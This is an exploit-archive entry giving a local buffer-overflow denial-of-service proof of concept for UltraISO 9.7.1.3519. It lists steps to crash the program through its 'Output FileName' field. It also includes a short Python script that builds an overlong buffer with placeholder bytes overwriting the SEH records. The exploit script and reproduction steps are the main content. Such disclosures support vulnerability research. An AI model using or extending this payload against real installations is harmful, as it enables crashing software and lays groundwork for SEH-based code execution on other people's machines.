UltraISO 9.7.1.3519 Output FileName Denial Of Service

2018.12.16
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite # Discovery by: Francisco Ramirez # Discovery Date: 2018-12-14 # Vendor Homepage: https://www.ultraiso.com/ # Software Link : https://www.ultraiso.com/download.html # Tested Version: 9.7.1.3519 # Tested on: Windows 10 Pro - 64 bit # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run python code : python UltraISO_9.7.1.3519.py # 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard # 3.- Open UltraISO_9.7.1.3519 # 4.- In the Window select 'Tools' > 'Make CD/DVD Image' # 5.- In the field 'Output FileName' remove the default path. # 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName' # 7.- Click 'Make' and you will see a crash. #!/usr/bin/env python a_letters = "\x41" * 304 seRecord = "\x42" * 4 sehRecord = "\x43" * 4 buffer = a_letters + seRecord + sehRecord f = open ("UltraISO_9.7.1.3519.txt", "w") f.write(buffer) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top